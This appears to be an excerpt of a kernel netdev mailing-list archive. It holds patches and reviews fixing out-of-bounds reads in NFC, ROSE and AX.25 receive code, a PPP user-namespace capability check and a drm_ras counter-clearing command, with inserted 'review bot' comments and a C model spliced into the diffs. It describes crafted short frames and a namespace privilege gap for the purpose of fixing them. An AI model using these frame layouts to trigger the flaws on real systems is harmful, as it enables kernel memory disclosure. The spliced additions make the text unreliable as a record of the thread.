> Signed-off-by: Ashutosh Desai <ashutoshdesai993@gmail.com>
> ---

Same answer: Testing skb->len alone is not enough.

skbs can have fragments, pskb_may_pull() or skb_linearize() would be needed.

^ permalink raw reply

* Re: [PATCH] nfc: hci: fix OOB heap read on short HCP frames.
From: Eric Dumazet @ 2026-04-09  7:14 UTC (permalink / raw)
  To: Ashutosh Desai; +Cc: netdev, davem, kuba, pabeni, horms, linux-kernel
In-Reply-To: <20260408223113.2009304-1-ashutoshdesai993@gmail.com>

On Wed, Apr 8, 2026 at 3:31 PM Ashutosh Desai
<ashutoshdesai993@gmail.com> wrote:
>
> Both nfc_hci_recv_from_llc() and nfc_hci_msg_rx_work() read byte 1 of
> an sk_buff (the HCP message header field) without first verifying the
> buffer contains at least NFC_HCI_HCP_HEADER_LEN (2) bytes.
>
> The SHDLC LLC layer only filters zero-length frames; a single-byte
> I-frame from a malicious NFC peer therefore reaches the HCI reassembly
> path where packet->message.header is read one byte past the valid data.
> The same issue is present in the NCI HCI implementation (nci/hci.c)
> via nci_hci_data_received_cb() and nci_hci_msg_rx_work().
>
> Add an explicit length check before accessing the message header at
> all four locations, freeing the skb on malformed input.
>
> Signed-off-by: Ashutosh Desai <ashutoshdesai993@gmail.com>
> ---

Same answer: Testing skb->len alone is not enough.

skbs can have fragments, pskb_may_pull() or skb_linearize() would be needed.

^ permalink raw reply

* Re: [PATCH] rose: fix OOB read on short CLEAR REQUEST frames.
From: Eric Dumazet @ 2026-04-09  7:13 UTC (permalink / raw)
  To: Ashutosh Desai
  Cc: netdev, linux-hams, davem, kuba, pabeni, horms, linux-kernel
In-Reply-To: <20260409013246.2051746-1-ashutoshdesai993@gmail.com>

On Wed, Apr 8, 2026 at 6:32 PM Ashutosh Desai
<ashutoshdesai993@gmail.com> wrote:
>
> rose_process_rx_frame() dispatches to state machines after calling
> rose_decode(), but does not verify the frame is long enough before
> doing so. All five state machine handlers read skb->data[3] and
> skb->data[4] (cause and diagnostic bytes) when handling a
> ROSE_CLEAR_REQUEST frame, yet the only upstream length check is
> ROSE_MIN_LEN (3 bytes) in rose_route_frame().
>
> A crafted 3-byte ROSE CLEAR REQUEST frame (bytes: GFI/LCI-high,
> LCI-low, 0x13) passes the minimum length gate and reaches the state
> machines, where skb->data[3] and skb->data[4] are read one and two
> bytes past the valid buffer respectively.
>
> Add a check in rose_process_rx_frame() that drops any CLEAR REQUEST
> frame shorter than 5 bytes (3-byte header + cause + diagnostic),
> covering all five state machines with a single guard.
>
> Signed-off-by: Ashutosh Desai <ashutoshdesai993@gmail.com>
> ---
>  net/rose/rose_in.c | 5 +++++
>  1 file changed, 5 insertions(+)
>
> diff --git a/net/rose/rose_in.c b/net/rose/rose_in.c
> index 0276b393f..1ac9a6aee 100644
> --- a/net/rose/rose_in.c
> +++ b/net/rose/rose_in.c
> @@ -271,6 +271,11 @@ int rose_process_rx_frame(struct sock *sk, struct sk_buff *skb)
>
>         frametype = rose_decode(skb, &ns, &nr, &q, &d, &m);
>
> +       if (frametype == ROSE_CLEAR_REQUEST && skb->len < 5) {
> +               kfree_skb(skb);
> +               return 0;
> +       }
> +
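
Review bot: the added branch calls kfree_skb(skb) and then returns 0, so
check what the callers of rose_process_rx_frame() do with a zero return.
If 0 means "not queued, caller frees", the skb is freed twice and the
branch should only return 0. The literal 5 would also be easier to audit
as a named constant or with a comment (3-byte header + cause +
diagnostic, as the commit message spells out).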

Same answer: Testing skb->len alone is not enough.

skbs can have fragments, pskb_may_pull() or skb_linearize() would be needed.

^ permalink raw reply
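
The objection raised in the replies above (skb->len counts bytes held in fragments, while skb->data[] only reaches the linear area) is shown here as a user-space model of the ROSE CLEAR REQUEST case. This is an added example, not code from the thread or the kernel: struct model_skb, model_may_pull(), run_case() and the sample frame bytes are constructed stand-ins, not kernel APIs.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CLEAR_REQ_LEN 5	/* 3-byte header + cause + diagnostic */

enum verdict { DROPPED, PARSED, WOULD_OVERREAD };

/* User-space model only; this is not the kernel's struct sk_buff. */
struct model_skb {
	uint8_t *data;		/* linear area: headlen bytes reachable via data[] */
	size_t headlen;
	const uint8_t *frag;	/* remaining bytes, held in one paged fragment */
	size_t len;		/* total length, the value skb->len reports */
};

/* Stand-in for pskb_may_pull(): make the first n bytes linear, or fail. */
static int model_may_pull(struct model_skb *skb, size_t n)
{
	uint8_t *grown;

	if (n <= skb->headlen)
		return 1;
	if (n > skb->len)
		return 0;	/* the frame really is too short */
	grown = realloc(skb->data, n);
	if (!grown)
		return 0;
	memcpy(grown + skb->headlen, skb->frag, n - skb->headlen);
	skb->frag += n - skb->headlen;
	skb->data = grown;
	skb->headlen = n;
	return 1;
}

/* Read cause and diagnostic behind one of the two guards under discussion. */
static enum verdict parse_clear_request(struct model_skb *skb, int use_may_pull,
					uint8_t *cause, uint8_t *diag)
{
	if (use_may_pull) {
		if (!model_may_pull(skb, CLEAR_REQ_LEN))
			return DROPPED;
	} else {
		if (skb->len < CLEAR_REQ_LEN)	/* guard as in the quoted hunk */
			return DROPPED;
		/* The model stops here instead of indexing past the linear area. */
		if (skb->headlen < CLEAR_REQ_LEN)
			return WOULD_OVERREAD;
	}
	*cause = skb->data[3];
	*diag = skb->data[4];
	return PARSED;
}

/* Constructed sample frame: GFI/LCI-high, LCI-low, 0x13, cause, diagnostic. */
static const uint8_t sample[CLEAR_REQ_LEN] = { 0x10, 0x01, 0x13, 0x09, 0x7a };

/* Split the first len sample bytes into headlen linear bytes plus a
 * fragment, then run the chosen guard over the result. */
static enum verdict run_case(int use_may_pull, size_t len, size_t headlen,
			     uint8_t *cause, uint8_t *diag)
{
	struct model_skb skb = { .headlen = headlen, .len = len };
	enum verdict v;

	if (headlen > len || len > sizeof(sample))
		return DROPPED;
	skb.data = malloc(headlen ? headlen : 1);
	if (!skb.data)
		return DROPPED;
	memcpy(skb.data, sample, headlen);
	skb.frag = sample + headlen;
	v = parse_clear_request(&skb, use_may_pull, cause, diag);
	free(skb.data);
	return v;
}

int main(void)
{
	static const char *names[] = { "dropped", "parsed", "would over-read" };
	static const size_t cases[][2] = { { 3, 3 }, { 5, 5 }, { 5, 3 } };
	uint8_t c = 0, d = 0;

	for (size_t i = 0; i < 3; i++)
		printf("len=%zu linear=%zu: len-only=%s, may_pull=%s\n",
		       cases[i][0], cases[i][1],
		       names[run_case(0, cases[i][0], cases[i][1], &c, &d)],
		       names[run_case(1, cases[i][0], cases[i][1], &c, &d)]);
	return 0;
}
```

The third case (5 bytes total, 3 of them linear) is the one a total-length test lets through; the same shape applies to the 2-byte checks in the nfc and ax25 patches.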

* [PATCH net v3] ppp: require CAP_NET_ADMIN in target netns for unattached ioctls
From: Taegu Ha @ 2026-04-09  7:11 UTC (permalink / raw)
  To: Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Qingfang Deng, Kees Cook, Taegu Ha,
	Kuniyuki Iwashima, Sebastian Andrzej Siewior, Cyrill Gorcunov,
	linux-ppp, netdev, linux-kernel
  Cc: qingfang.deng, gnault, jaco, richardbgobert, ericwouds,
	teknoraver

/dev/ppp open is currently authorized against file->f_cred->user_ns,
while unattached administrative ioctls operate on current->nsproxy->net_ns.

As a result, a local unprivileged user can create a new user namespace
with CLONE_NEWUSER, gain CAP_NET_ADMIN only in that new user namespace,
and still issue PPPIOCNEWUNIT, PPPIOCATTACH, or PPPIOCATTCHAN against
an inherited network namespace.

Require CAP_NET_ADMIN in the user namespace that owns the target network
namespace before handling unattached PPP administrative ioctls.

This preserves normal pppd operation in the network namespace it is
actually privileged in, while rejecting the userns-only inherited-netns
case.

Fixes: 273ec51dd7ce ("net: ppp_generic - introduce net-namespace functionality v2")
Signed-off-by: Taegu Ha <hataegu0826@gmail.com>
---
 drivers/net/ppp/ppp_generic.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
index e9b41777be80..c2024684b10d 100644
--- a/drivers/net/ppp/ppp_generic.c
+++ b/drivers/net/ppp/ppp_generic.c
@@ -1057,6 +1057,9 @@ static int ppp_unattached_ioctl(struct net *net, struct ppp_file *pf,
 	struct ppp_net *pn;
 	int __user *p = (int __user *)arg;
 
+	if (!ns_capable(net->user_ns, CAP_NET_ADMIN))
+		return -EPERM;
+
 	switch (cmd) {
 	case PPPIOCNEWUNIT:
 		/* Create a new ppp unit */
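
Review bot: the new ns_capable(net->user_ns, CAP_NET_ADMIN) test at the
top of ppp_unattached_ioctl() carries no comment, yet per the commit
message it is the only check that ties the caller to the netns the ioctl
acts on, because open is authorized against file->f_cred->user_ns
instead. A short comment saying that the capability must be held in the
user namespace owning the target netns would keep the check from being
dropped later as redundant with the open-time one. Because it sits above
the switch it also runs for every cmd, not only PPPIOCNEWUNIT,
PPPIOCATTACH and PPPIOCATTCHAN, so confirm that returning -EPERM ahead of
whatever the switch returns for unrecognized commands is intended.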
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH] ax25: fix OOB read after address header strip in ax25_rcv().
From: Eric Dumazet @ 2026-04-09  7:08 UTC (permalink / raw)
  To: Ashutosh Desai
  Cc: netdev, linux-hams, jreuter, davem, kuba, pabeni, horms,
	linux-kernel
In-Reply-To: <20260409012235.2049389-1-ashutoshdesai993@gmail.com>

On Wed, Apr 8, 2026 at 6:22 PM Ashutosh Desai
<ashutoshdesai993@gmail.com> wrote:
>
> ax25_rcv() calls skb_pull(skb, ax25_addr_size(&dp)) to strip the
> address header, then immediately reads skb->data[0] and skb->data[1]
> without verifying the buffer still contains at least 2 bytes.
>
> A crafted 15-byte KISS frame (1 KISS byte + 14 address bytes with
> EBIT set in the source address, no control/PID bytes) passes
> ax25_addr_parse() which only requires len >= 14, and passes the KISS
> byte check (low nibble == 0). After skb_pull(1) in ax25_kiss_rcv()
> and skb_pull(14) in ax25_rcv(), skb->len is 0 and the subsequent
> reads of skb->data[0] (control byte) and skb->data[1] (PID byte)
> are out of bounds.
>
> Add a check that at least 2 bytes remain after stripping the address
> header, freeing the skb and returning on malformed input.
>
> Signed-off-by: Ashutosh Desai <ashutoshdesai993@gmail.com>
> ---
>  net/ax25/ax25_in.c | 5 +++++
>  1 file changed, 5 insertions(+)
>
> diff --git a/net/ax25/ax25_in.c b/net/ax25/ax25_in.c
> index d75b3e9ed..92baac77f 100644
> --- a/net/ax25/ax25_in.c
> +++ b/net/ax25/ax25_in.c
> @@ -217,6 +217,11 @@ static int ax25_rcv(struct sk_buff *skb, struct net_device *dev,
>          */
>         skb_pull(skb, ax25_addr_size(&dp));
>
> +       if (skb->len < 2) {
> +               kfree_skb(skb);
> +               return 0;
> +       }
> +
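Review bot: the bare 2 in the new skb->len test is unexplained; the commit message identifies the two bytes as the control and PID bytes, so a short comment or a named constant would make the bound self-describing. skb->len also counts bytes held outside the linear area, so pskb_may_pull(skb, 2) would check the length and guarantee that skb->data[0] and skb->data[1] are directly readable.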

Are you aware of pskb_may_pull() ?

Testing skb->len is not enough.

I suspect all net/ax25 is expecting linear skbs and never considered fragments.

^ permalink raw reply

* [PATCH v2 2/2] drm/xe/xe_drm_ras: Add support for clear-error-counter in XE drm_ras
From: Riana Tauro @ 2026-04-09  7:33 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: aravind.iddamsetty, anshuman.gupta, rodrigo.vivi, joonas.lahtinen,
	simona.vetter, airlied, pratik.bari, joshua.santosh.ranjan,
	ashwin.kumar.kulkarni, shubham.kumar, ravi.kishore.koppuravuri,
	raag.jadav, anvesh.bakwad, maarten.lankhorst, Riana Tauro
In-Reply-To: <20260409073318.2909379-4-riana.tauro@intel.com>

Add support for clear-error-counter command in XE drm_ras.
This resets the counter value.

Usage:

$ sudo ynl --family drm_ras  --do clear-error-counter --json \
'{"node-id":1, "error-id":1}'
None

Signed-off-by: Riana Tauro <riana.tauro@intel.com>
Reviewed-by: Raag Jadav <raag.jadav@intel.com>
---
 drivers/gpu/drm/xe/xe_drm_ras.c | 35 +++++++++++++++++++++++++++++++--
 1 file changed, 33 insertions(+), 2 deletions(-)

diff --git a/drivers/gpu/drm/xe/xe_drm_ras.c b/drivers/gpu/drm/xe/xe_drm_ras.c
index e07dc23a155e..c21c8b428de6 100644
--- a/drivers/gpu/drm/xe/xe_drm_ras.c
+++ b/drivers/gpu/drm/xe/xe_drm_ras.c
@@ -27,6 +27,16 @@ static int hw_query_error_counter(struct xe_drm_ras_counter *info,
 	return 0;
 }
 
+static int hw_clear_error_counter(struct xe_drm_ras_counter *info, u32 error_id)
+{
+	if (!info || !info[error_id].name)
+		return -ENOENT;
+
+	atomic_set(&info[error_id].counter, 0);
+
+	return 0;
+}
+
 static int query_uncorrectable_error_counter(struct drm_ras_node *ep, u32 error_id,
 					     const char **name, u32 *val)
 {
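Review bot: hw_clear_error_counter() reads info[error_id].name with no bound on error_id inside the function, so it is only safe when every caller has already range-checked the id; either add the bound here or state that precondition in a comment. atomic_set() also discards the previous count without a trace, so a debug message carrying the old value would keep a record of what was cleared.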
@@ -37,6 +47,15 @@ static int query_uncorrectable_error_counter(struct drm_ras_node *ep, u32 error_
 	return hw_query_error_counter(info, error_id, name, val);
 }
 
+static int clear_uncorrectable_error_counter(struct drm_ras_node *node, u32 error_id)
+{
+	struct xe_device *xe = node->priv;
+	struct xe_drm_ras *ras = &xe->ras;
+	struct xe_drm_ras_counter *info = ras->info[DRM_XE_RAS_ERR_SEV_UNCORRECTABLE];
+
+	return hw_clear_error_counter(info, error_id);
+}
+
 static int query_correctable_error_counter(struct drm_ras_node *ep, u32 error_id,
 					   const char **name, u32 *val)
 {
@@ -47,6 +66,15 @@ static int query_correctable_error_counter(struct drm_ras_node *ep, u32 error_id
 	return hw_query_error_counter(info, error_id, name, val);
 }
 
+static int clear_correctable_error_counter(struct drm_ras_node *node, u32 error_id)
+{
+	struct xe_device *xe = node->priv;
+	struct xe_drm_ras *ras = &xe->ras;
+	struct xe_drm_ras_counter *info = ras->info[DRM_XE_RAS_ERR_SEV_CORRECTABLE];
+
+	return hw_clear_error_counter(info, error_id);
+}
+
 static struct xe_drm_ras_counter *allocate_and_copy_counters(struct xe_device *xe)
 {
 	struct xe_drm_ras_counter *counter;
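Review bot: clear_correctable_error_counter() is a line-for-line copy of clear_uncorrectable_error_counter() apart from the DRM_XE_RAS_ERR_SEV_* index; one helper taking the severity would remove the duplication. The new functions also name the parameter node while the neighbouring query_*_error_counter() functions call it ep.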
@@ -92,10 +120,13 @@ static int assign_node_params(struct xe_device *xe, struct drm_ras_node *node,
 	if (IS_ERR(ras->info[severity]))
 		return PTR_ERR(ras->info[severity]);
 
-	if (severity == DRM_XE_RAS_ERR_SEV_CORRECTABLE)
+	if (severity == DRM_XE_RAS_ERR_SEV_CORRECTABLE) {
 		node->query_error_counter = query_correctable_error_counter;
-	else
+		node->clear_error_counter = clear_correctable_error_counter;
+	} else {
 		node->query_error_counter = query_uncorrectable_error_counter;
+		node->clear_error_counter = clear_uncorrectable_error_counter;
+	}
 
 	return 0;
 }
-- 
2.47.1


^ permalink raw reply related

* [PATCH v2 1/2] drm/drm_ras: Add clear-error-counter netlink command to drm_ras
From: Riana Tauro @ 2026-04-09  7:33 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: aravind.iddamsetty, anshuman.gupta, rodrigo.vivi, joonas.lahtinen,
	simona.vetter, airlied, pratik.bari, joshua.santosh.ranjan,
	ashwin.kumar.kulkarni, shubham.kumar, ravi.kishore.koppuravuri,
	raag.jadav, anvesh.bakwad, maarten.lankhorst, Riana Tauro,
	Jakub Kicinski, Zack McKevitt, Lijo Lazar, Hawking Zhang,
	David S. Miller, Paolo Abeni, Eric Dumazet
In-Reply-To: <20260409073318.2909379-4-riana.tauro@intel.com>

Introduce a new 'clear-error-counter' drm_ras command to reset the counter
value for a specific error counter of a given node.

The command is a 'do' netlink request with 'node-id' and 'error-id'
as parameters with no response payload.

Usage:

$ sudo ynl --family drm_ras  --do clear-error-counter --json \
'{"node-id":1, "error-id":1}'
None

Cc: Jakub Kicinski <kuba@kernel.org>
Cc: Zack McKevitt <zachary.mckevitt@oss.qualcomm.com>
Cc: Lijo Lazar <lijo.lazar@amd.com>
Cc: Hawking Zhang <Hawking.Zhang@amd.com>
Cc: David S. Miller <davem@davemloft.net>
Cc: Paolo Abeni <pabeni@redhat.com>
Cc: Eric Dumazet <edumazet@google.com>
Signed-off-by: Riana Tauro <riana.tauro@intel.com>
Reviewed-by: Jakub Kicinski <kuba@kernel.org>
Reviewed-by: Raag Jadav <raag.jadav@intel.com>
---
 Documentation/gpu/drm-ras.rst            |  8 +++++
 Documentation/netlink/specs/drm_ras.yaml | 13 ++++++-
 drivers/gpu/drm/drm_ras.c                | 43 +++++++++++++++++++++++-
 drivers/gpu/drm/drm_ras_nl.c             | 13 +++++++
 drivers/gpu/drm/drm_ras_nl.h             |  2 ++
 include/drm/drm_ras.h                    | 11 ++++++
 include/uapi/drm/drm_ras.h               |  1 +
 7 files changed, 89 insertions(+), 2 deletions(-)

diff --git a/Documentation/gpu/drm-ras.rst b/Documentation/gpu/drm-ras.rst
index 70b246a78fc8..4636e68f5678 100644
--- a/Documentation/gpu/drm-ras.rst
+++ b/Documentation/gpu/drm-ras.rst
@@ -52,6 +52,8 @@ User space tools can:
   as a parameter.
 * Query specific error counter values with the ``get-error-counter`` command, using both
   ``node-id`` and ``error-id`` as parameters.
+* Clear specific error counters with the ``clear-error-counter`` command, using both
+  ``node-id`` and ``error-id`` as parameters.
 
 YAML-based Interface
 --------------------
@@ -101,3 +103,9 @@ Example: Query an error counter for a given node
     sudo ynl --family drm_ras --do get-error-counter --json '{"node-id":0, "error-id":1}'
     {'error-id': 1, 'error-name': 'error_name1', 'error-value': 0}
 
+Example: Clear an error counter for a given node
+
+.. code-block:: bash
+
+    sudo ynl --family drm_ras --do clear-error-counter --json '{"node-id":0, "error-id":1}'
+    None
diff --git a/Documentation/netlink/specs/drm_ras.yaml b/Documentation/netlink/specs/drm_ras.yaml
index 79af25dac3c5..e113056f8c01 100644
--- a/Documentation/netlink/specs/drm_ras.yaml
+++ b/Documentation/netlink/specs/drm_ras.yaml
@@ -99,7 +99,7 @@ operations:
       flags: [admin-perm]
       do:
         request:
-          attributes:
+          attributes: &id-attrs
             - node-id
             - error-id
         reply:
@@ -113,3 +113,14 @@ operations:
             - node-id
         reply:
           attributes: *errorinfo
+    -
+      name: clear-error-counter
+      doc: >-
+           Clear error counter for a given node.
+           The request includes the error-id and node-id of the
+           counter to be cleared.
+      attribute-set: error-counter-attrs
+      flags: [admin-perm]
+      do:
+        request:
+          attributes: *id-attrs
diff --git a/drivers/gpu/drm/drm_ras.c b/drivers/gpu/drm/drm_ras.c
index b2fa5ab86d87..d6eab29a1394 100644
--- a/drivers/gpu/drm/drm_ras.c
+++ b/drivers/gpu/drm/drm_ras.c
@@ -26,7 +26,7 @@
  * efficient lookup by ID. Nodes can be registered or unregistered
  * dynamically at runtime.
  *
- * A Generic Netlink family `drm_ras` exposes two main operations to
+ * A Generic Netlink family `drm_ras` exposes the below operations to
  * userspace:
  *
  * 1. LIST_NODES: Dump all currently registered RAS nodes.
@@ -37,6 +37,10 @@
  *    Returns all counters of a node if only Node ID is provided or specific
  *    error counters.
  *
+ * 3. CLEAR_ERROR_COUNTER: Clear error counter of a given node.
+ *    Userspace must provide Node ID, Error ID.
+ *    Clears specific error counter of a node if supported.
+ *
  * Node registration:
  *
  * - drm_ras_node_register(): Registers a new node and assigns
@@ -66,6 +70,8 @@
  *   operation, fetching all counters from a specific node.
  * - drm_ras_nl_get_error_counter_doit(): Implements the GET_ERROR_COUNTER doit
  *   operation, fetching a counter value from a specific node.
+ * - drm_ras_nl_clear_error_counter_doit(): Implements the CLEAR_ERROR_COUNTER doit
+ *   operation, clearing a counter value from a specific node.
  */
 
 static DEFINE_XARRAY_ALLOC(drm_ras_xa);
@@ -314,6 +320,41 @@ int drm_ras_nl_get_error_counter_doit(struct sk_buff *skb,
 	return doit_reply_value(info, node_id, error_id);
 }
 
+/**
+ * drm_ras_nl_clear_error_counter_doit() - Clear an error counter of a node
+ * @skb: Netlink message buffer
+ * @info: Generic Netlink info containing attributes of the request
+ *
+ * Extracts the node ID and error ID from the netlink attributes and
+ * clears the current value.
+ *
+ * Return: 0 on success, or negative errno on failure.
+ */
+int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
+					struct genl_info *info)
+{
+	struct drm_ras_node *node;
+	u32 node_id, error_id;
+
+	if (!info->attrs ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID) ||
+	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID))
+		return -EINVAL;
+
+	node_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID]);
+	error_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID]);
+
+	node = xa_load(&drm_ras_xa, node_id);
+	if (!node || !node->clear_error_counter)
+		return -ENOENT;
+
+	if (error_id < node->error_counter_range.first ||
+	    error_id > node->error_counter_range.last)
+		return -EINVAL;
+
+	return node->clear_error_counter(node, error_id);
+}
+
 /**
  * drm_ras_node_register() - Register a new RAS node
  * @node: Node structure to register
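Review bot: the node returned by xa_load() in drm_ras_nl_clear_error_counter_doit() is dereferenced and its callback invoked with no lock or reference visible in this hunk, while the header comment of the same file says nodes can be unregistered dynamically at runtime; please state what keeps the node alive across the callback. Returning -ENOENT for both a missing node and a missing clear_error_counter callback also makes "no such node" indistinguishable from "clearing not supported"; -EOPNOTSUPP for the latter would be clearer to user space.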
diff --git a/drivers/gpu/drm/drm_ras_nl.c b/drivers/gpu/drm/drm_ras_nl.c
index 16803d0c4a44..dea1c1b2494e 100644
--- a/drivers/gpu/drm/drm_ras_nl.c
+++ b/drivers/gpu/drm/drm_ras_nl.c
@@ -22,6 +22,12 @@ static const struct nla_policy drm_ras_get_error_counter_dump_nl_policy[DRM_RAS_
 	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
 };
 
+/* DRM_RAS_CMD_CLEAR_ERROR_COUNTER - do */
+static const struct nla_policy drm_ras_clear_error_counter_nl_policy[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID + 1] = {
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
+	[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID] = { .type = NLA_U32, },
+};
+
 /* Ops table for drm_ras */
 static const struct genl_split_ops drm_ras_nl_ops[] = {
 	{
@@ -43,6 +49,13 @@ static const struct genl_split_ops drm_ras_nl_ops[] = {
 		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID,
 		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DUMP,
 	},
+	{
+		.cmd		= DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
+		.doit		= drm_ras_nl_clear_error_counter_doit,
+		.policy		= drm_ras_clear_error_counter_nl_policy,
+		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID,
+		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DO,
+	},
 };
 
 struct genl_family drm_ras_nl_family __ro_after_init = {
diff --git a/drivers/gpu/drm/drm_ras_nl.h b/drivers/gpu/drm/drm_ras_nl.h
index 06ccd9342773..a398643572a5 100644
--- a/drivers/gpu/drm/drm_ras_nl.h
+++ b/drivers/gpu/drm/drm_ras_nl.h
@@ -18,6 +18,8 @@ int drm_ras_nl_get_error_counter_doit(struct sk_buff *skb,
 				      struct genl_info *info);
 int drm_ras_nl_get_error_counter_dumpit(struct sk_buff *skb,
 					struct netlink_callback *cb);
+int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
+					struct genl_info *info);
 
 extern struct genl_family drm_ras_nl_family;
 
diff --git a/include/drm/drm_ras.h b/include/drm/drm_ras.h
index 5d50209e51db..f2a787bc4f64 100644
--- a/include/drm/drm_ras.h
+++ b/include/drm/drm_ras.h
@@ -58,6 +58,17 @@ struct drm_ras_node {
 	int (*query_error_counter)(struct drm_ras_node *node, u32 error_id,
 				   const char **name, u32 *val);
 
+	/**
+	 * @clear_error_counter:
+	 *
+	 * This callback is used by drm_ras to clear a specific error counter.
+	 * Driver should implement this callback to support clearing error counters
+	 * of a node.
+	 *
+	 * Returns: 0 on success, negative error code on failure.
+	 */
+	int (*clear_error_counter)(struct drm_ras_node *node, u32 error_id);
+
 	/** @priv: Driver private data */
 	void *priv;
 };
diff --git a/include/uapi/drm/drm_ras.h b/include/uapi/drm/drm_ras.h
index 5f40fa5b869d..218a3ee86805 100644
--- a/include/uapi/drm/drm_ras.h
+++ b/include/uapi/drm/drm_ras.h
@@ -41,6 +41,7 @@ enum {
 enum {
 	DRM_RAS_CMD_LIST_NODES = 1,
 	DRM_RAS_CMD_GET_ERROR_COUNTER,
+	DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
 
 	__DRM_RAS_CMD_MAX,
 	DRM_RAS_CMD_MAX = (__DRM_RAS_CMD_MAX - 1)
-- 
2.47.1


^ permalink raw reply related

* [PATCH v2 0/2] Add clear-error-counter command to drm_ras
From: Riana Tauro @ 2026-04-09  7:33 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev
  Cc: aravind.iddamsetty, anshuman.gupta, rodrigo.vivi, joonas.lahtinen,
	simona.vetter, airlied, pratik.bari, joshua.santosh.ranjan,
	ashwin.kumar.kulkarni, shubham.kumar, ravi.kishore.koppuravuri,
	raag.jadav, anvesh.bakwad, maarten.lankhorst, Riana Tauro

Add clear-error-counter command to drm_ras to clear a specific error
counter of a node. The request parameters for this command are
node-id and error-id and no response payload.
Implement the callback in XE driver to demonstrate usage.

Usage:

$ sudo ynl --family drm_ras  --dump get-error-counter --json '{"node-id":1}'
[{'error-id': 1, 'error-name': 'core-compute', 'error-value': 0},
 {'error-id': 2, 'error-name': 'soc-internal', 'error-value': 3}]

$ sudo ynl --family drm_ras  --do clear-error-counter --json \
'{"node-id":1, "error-id":2}'
None

$ sudo ynl --family drm_ras  --dump get-error-counter --json '{"node-id":1}'
[{'error-id': 1, 'error-name': 'core-compute', 'error-value': 0},
 {'error-id': 2, 'error-name': 'soc-internal', 'error-value': 0}]

Rev2: Split patches

Riana Tauro (2):
  drm/drm_ras: Add clear-error-counter netlink command to drm_ras
  drm/xe/xe_drm_ras: Add support for clear-error-counter in XE drm_ras

 Documentation/gpu/drm-ras.rst            |  8 +++++
 Documentation/netlink/specs/drm_ras.yaml | 13 ++++++-
 drivers/gpu/drm/drm_ras.c                | 43 +++++++++++++++++++++++-
 drivers/gpu/drm/drm_ras_nl.c             | 13 +++++++
 drivers/gpu/drm/drm_ras_nl.h             |  2 ++
 drivers/gpu/drm/xe/xe_drm_ras.c          | 35 +++++++++++++++++--
 include/drm/drm_ras.h                    | 11 ++++++
 include/uapi/drm/drm_ras.h               |  1 +
 8 files changed, 122 insertions(+), 4 deletions(-)

-- 
2.47.1


^ permalink raw reply

* Re: [PATCH net v3 0/5] bonding: 3ad: fix carrier state with no valid slaves
From: Jonas Gorski @ 2026-04-09  6:53 UTC (permalink / raw)
  To: Jakub Kicinski, Louis Scalbert
  Cc: netdev, andrew+netdev, jv, edumazet, pabeni, fbl, andy,
	shemminger, maheshb
In-Reply-To: <20260408201341.68f31247@kernel.org>

On 09/04/2026 05:13, Jakub Kicinski wrote:
> On Wed,  8 Apr 2026 17:23:48 +0200 Louis Scalbert wrote:
>> The current behavior is not compliant with the LACP standard. This
>> patchset introduces a working behavior that is not strictly
>> standard-compliant either, but is widely adopted across the industry.
>> It consists of bringing the bonding master interface down to signal to
>> upper-layer processes that it is not usable.
> 
> Is the only problem the compliance? If so I don't think this qualifies
> as a fix. Please drop the Fixes tags and repost for net-next. Please
> keep in mind the 24h reposting period (also I need some time tomorrow
> to queue your patch to the CI so that the selftest passes when v4 is
> posted :()

Signalling link up too early can cause issues for some protocols that
may change behavior in the absence of PDUs from a link partner.

E.g. AFAIU RSTP may decide the bond is an edge port because no RSTP
BPDUs were received and put the bond in forwarding, which then temporarily
creates a loop once the bond actually starts forwarding packets (until
it receives the next RSTP BPDU, which may take up to two seconds).

Best regards,
Jonas

^ permalink raw reply

* Re: [net,PATCH v2] net: ks8851: Reinstate disabling of BHs around IRQ handler
From: Nicolai Buchwitz @ 2026-04-09  6:52 UTC (permalink / raw)
  To: Marek Vasut
  Cc: netdev, stable, David S. Miller, Andrew Lunn, Eric Dumazet,
	Jakub Kicinski, Paolo Abeni, Ronald Wahl, Yicong Hui,
	linux-kernel
In-Reply-To: <20260408162535.98108-1-marex@nabladev.com>

Hi Marek

On 8.4.2026 18:24, Marek Vasut wrote:

> [...]

> +	bool			no_bh_in_irq_handler;

> [...]

> +/**
> + * ks8851_irq_nobh - IRQ handler with BH disabled
> + * @irq: IRQ number
> + * @_ks: cookie
> + *
> + * Wrapper which calls ks8851_irq() with BH disabled.
> + */
> +static irqreturn_t ks8851_irq_nobh(int irq, void *_ks)
> +{
> +	irqreturn_t ret;
> +
> +	local_bh_disable();
> +	ret = ks8851_irq(irq, _ks);
> +	local_bh_enable();
> +
> +	return ret;
> +}
> +
>  /**
>   * ks8851_flush_tx_work - flush outstanding TX work
>   * @ks: The device state
> @@ -408,7 +426,9 @@ static int ks8851_net_open(struct net_device *dev)
>  	unsigned long flags;
>  	int ret;
> 
> -	ret = request_threaded_irq(dev->irq, NULL, ks8851_irq,
